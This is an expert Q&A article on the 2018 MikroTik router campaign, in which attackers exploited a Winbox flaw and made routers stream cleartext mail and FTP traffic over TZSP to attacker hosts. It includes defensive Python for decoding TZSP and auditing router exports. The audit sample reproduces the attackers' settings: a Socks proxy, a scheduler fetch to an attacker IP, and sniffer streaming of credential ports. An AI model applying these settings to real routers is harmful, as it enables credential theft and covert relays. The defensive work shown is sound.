Researchers at Qihoo 360 Netlab discovered hackers using vulnerable MikroTik routers to hijack TaZmen Sniffer Protocol traffic and send it to domains under their control. What is TZSP traffic and how are attackers gaining control of routers with this MikroTik router hack?
The TaZmen Sniffer Protocol (TZSP) is an open encapsulation protocol: it prepends a small header to a captured packet and carries the result over the User Datagram Protocol (UDP) to a remote host. It is best known for delivering captured 802.11 wireless frames from sensors to intrusion detection systems, such as Snort; protocol analyzers, such as Wireshark; wireless tracking; and other wireless applications. The packet sniffer built into MikroTik RouterOS uses it the same way to stream whatever the router captures to a remote collector.
TZSP rides on UDP because UDP carries far less overhead than TCP: it neither guarantees delivery nor preserves the order in which packets were sent. For a capture stream that trade-off is acceptable, since a dropped or reordered datagram costs nothing more than a gap in the capture.
Researchers at the Chinese cybersecurity company Qihoo 360 Netlab reported that more than 7,500 MikroTik routers worldwide were sending their TZSP sniffer traffic to 10 attacker-controlled IP addresses -- one address was taken out of service after the initial research was released.
In the MikroTik router hack, attackers modified each device's packet-sniffer settings so that it forwarded captured traffic to locations they chose. The way in was a vulnerability in Winbox, the RouterOS management interface (CVE-2018-14847), which let remote attackers take control of vulnerable MikroTik routers in Russia, Iran, Brazil, India and Ukraine. By changing a single byte related to the session ID in a Winbox request, the attackers bypassed authentication; once in, they reset the devices' packet-sniffer configuration so that copies of selected traffic were streamed to their own addresses.
Security researchers from Qihoo 360 Netlab reported that the attackers' sniffer filters singled out TCP ports 20, 21, 25, 110 and 143, which carry FTP data and control connections, Simple Mail Transfer Protocol, Post Office Protocol 3 and Internet Message Access Protocol traffic. Those protocols are cleartext and routinely carry usernames, passwords and message contents, so a copy of a session handed to the attacker is immediately useful. Because the sniffer only copies packets, the original TCP sessions complete normally and the users behind the router notice nothing.
The copies leave the router encapsulated in TZSP over UDP, sent by default to port 37008 on the collector. UDP's lack of a delivery guarantee means the collector may occasionally miss a frame, but that is the attacker's loss, not the victim's: whether or not TZSP datagrams arrive, the captured sessions themselves are untouched.
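The following Python is an added example for this article, not code from Qihoo 360 Netlab or MikroTik. It decodes a TZSP datagram the way a collector or an IDS would (version, type, encapsulation, tagged fields, then the wrapped frame) and applies two checks a defender would want: whether a router is streaming its sniffer output to a collector that is not on an allowlist, and whether the captured frame belongs to one of the cleartext TCP services the attackers filtered on. The datagram, the router and collector addresses and the allowlist are all constructed for illustration.

```python
"""Decode TZSP datagrams as streamed by the RouterOS packet sniffer and flag
exports a defender should worry about. Added example for this article; it is
not code from Qihoo 360 Netlab or MikroTik, and the datagram, addresses and
allowlist below are constructed for illustration."""
import struct

TZSP_PORT = 37008            # RouterOS default UDP port for sniffer streaming
TZSP_PAD_TAG = 0x00          # padding tag: no length byte
TZSP_END_TAG = 0x01          # end-of-tags: no length byte, the frame follows
ENCAP_ETHERNET = 1           # encapsulation value for Ethernet frames
# TCP ports Netlab saw the attackers' sniffer filter on (FTP-data, FTP, SMTP, POP3, IMAP)
HARVESTED_TCP_PORTS = {20, 21, 25, 110, 143}


def parse_tzsp(datagram: bytes) -> dict:
    """Return TZSP header fields, tagged options and the encapsulated frame.

    Layout: version(1) type(1) encapsulation(2, big-endian), then tagged
    fields until the end tag; every tag except padding and end is
    tag(1) length(1) value(length).
    """
    if len(datagram) < 4:
        raise ValueError("datagram too short for a TZSP header")
    version, ptype, encap = struct.unpack("!BBH", datagram[:4])
    if version != 1:
        raise ValueError(f"unsupported TZSP version {version}")
    tags = {}
    pos = 4
    while True:
        if pos >= len(datagram):
            raise ValueError("TZSP tag list is not terminated")
        tag = datagram[pos]
        pos += 1
        if tag == TZSP_END_TAG:
            break
        if tag == TZSP_PAD_TAG:
            continue
        if pos >= len(datagram):
            raise ValueError("truncated TZSP tag")
        length = datagram[pos]
        pos += 1
        tags[tag] = datagram[pos:pos + length]
        pos += length
    return {"type": ptype, "encapsulation": encap, "tags": tags, "frame": datagram[pos:]}


def tcp_ports_of_ethernet_frame(frame: bytes):
    """Return (src_port, dst_port) for an IPv4/TCP Ethernet frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType 0x0800 = IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6 or len(ip) < ihl + 4:                  # IP protocol 6 = TCP
        return None
    return struct.unpack("!HH", ip[ihl:ihl + 4])


def classify_export(router_ip, collector_ip, datagram, allowed_collectors):
    """Findings for one sniffer-stream datagram seen leaving router_ip."""
    findings = []
    if collector_ip not in allowed_collectors:
        findings.append(f"{router_ip} streams captures to unapproved collector {collector_ip}")
    parsed = parse_tzsp(datagram)
    if parsed["encapsulation"] == ENCAP_ETHERNET:
        ports = tcp_ports_of_ethernet_frame(parsed["frame"])
        if ports:
            hit = HARVESTED_TCP_PORTS.intersection(ports)
            if hit:
                findings.append(f"captured frame carries cleartext protocol on TCP port {min(hit)}")
    return findings


def build_sample_frame(src_port: int, dst_port: int) -> bytes:
    """Constructed IPv4/TCP SYN inside an Ethernet frame (sample input only)."""
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0, 64, 6, 0,
                     bytes([192, 168, 88, 10]), bytes([203, 0, 113, 5]))
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    return eth + ip + tcp


def build_sample_datagram(frame: bytes) -> bytes:
    """Wrap a frame as a TZSP v1 'received' datagram with Ethernet encapsulation."""
    header = struct.pack("!BBH", 1, 0, ENCAP_ETHERNET)
    return header + bytes([TZSP_PAD_TAG, TZSP_END_TAG]) + frame


if __name__ == "__main__":
    sample = build_sample_datagram(build_sample_frame(51234, 110))
    for finding in classify_export("192.168.88.1", "198.51.100.7", sample, {"10.0.0.5"}):
        print(finding)
```

On a live network the same logic runs over UDP datagrams to port 37008 pulled from a capture or a flow sensor, with `router_ip` and `collector_ip` taken from the outer IP header; the allowlist is whatever collectors your own monitoring legitimately uses.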
On most of the affected routers, the attackers also enabled a Socks4 proxy and restricted access to it to the 95.154.216.128/25 address block, giving themselves a relay through the victim's network that nobody else could use. Because a router's public address can change, they added a scheduler task that periodically reports the device's current IP address by fetching a URL; in Netlab's observation of Aug. 27, 2018, the task contacted 95.154.216.167 on port 2008.
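The persistence described above can be checked offline against a router's configuration dump. The following Python is an added example, not code from Netlab or MikroTik: it parses the text produced by RouterOS /export and reports an enabled Socks proxy, Socks access granted to a network outside an allowlist, a scheduler task that calls /tool fetch, and a sniffer streaming to an unapproved host. The export text it parses is constructed to mimic RouterOS syntax (the Socks port 4153 and the collector 203.0.113.9 are illustrative, not taken from the article), and the trusted networks and collectors are assumptions.

```python
"""Audit a RouterOS '/export' dump for the persistence the MikroTik attackers
left behind. Added example for this article, not code from Netlab or MikroTik;
SAMPLE_EXPORT is constructed to mimic RouterOS syntax and is not a real dump."""
import re

SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=4153
/ip socks access
add action=allow src-address=95.154.216.128/25
/system scheduler
add interval=5m name=poll on-event="/tool fetch url=http://95.154.216.167:2008/poll/ mode=http"
/tool sniffer
set filter-ip-protocol=tcp filter-port=20,21,25,110,143 streaming-enabled=yes streaming-server=203.0.113.9
"""

# key=value pairs; values may be double-quoted and contain spaces (on-event scripts)
KV_RE = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Return a list of (menu_path, command, {param: value}) for an /export."""
    menu = ""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # menu path lines such as '/ip socks'
            menu = line
            continue
        cmd, _, rest = line.partition(" ")
        params = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        entries.append((menu, cmd, params))
    return entries


def audit(entries, trusted_nets, trusted_collectors):
    """Findings matching the indicators from the MikroTik sniffer campaign."""
    findings = []
    for menu, cmd, p in entries:
        if menu == "/ip socks" and p.get("enabled") == "yes":
            findings.append(f"Socks proxy enabled on port {p.get('port', '1080')}")
        elif (menu == "/ip socks access" and p.get("action") == "allow"
              and p.get("src-address") not in trusted_nets):
            findings.append(f"Socks access allowed from untrusted {p.get('src-address', '?')}")
        elif menu == "/system scheduler" and "/tool fetch" in p.get("on-event", ""):
            url = re.search(r"url=(\S+)", p["on-event"])
            findings.append(f"scheduler task '{p.get('name', '?')}' fetches "
                            f"{url.group(1) if url else '?'}")
        elif (menu == "/tool sniffer" and p.get("streaming-enabled") == "yes"
              and p.get("streaming-server") not in trusted_collectors):
            findings.append(f"sniffer streams to untrusted collector {p.get('streaming-server')} "
                            f"(ports {p.get('filter-port', 'any')})")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_export(SAMPLE_EXPORT), {"192.168.88.0/24"}, {"10.0.0.5"}):
        print(finding)
```

Real exports wrap long lines with a trailing backslash and indent the continuation; join those lines before handing the text to `parse_export`, and treat a clean result as necessary but not sufficient, since an attacker with admin access can also have changed passwords, firewall rules and the sniffer filter itself.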
MikroTik has patched the vulnerability in RouterOS versions 6.40.9, 6.42.7 and 6.43 and recommends that users upgrade to those versions. Upgrading closes the door but does not undo changes an attacker already made, so administrators of devices that were reachable from the internet should also review the sniffer, Socks and scheduler configuration (for example with /tool sniffer print, /ip socks print and /system scheduler print), remove anything they did not set themselves, change the administrative credentials, and restrict Winbox and the other management services to trusted source addresses.
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)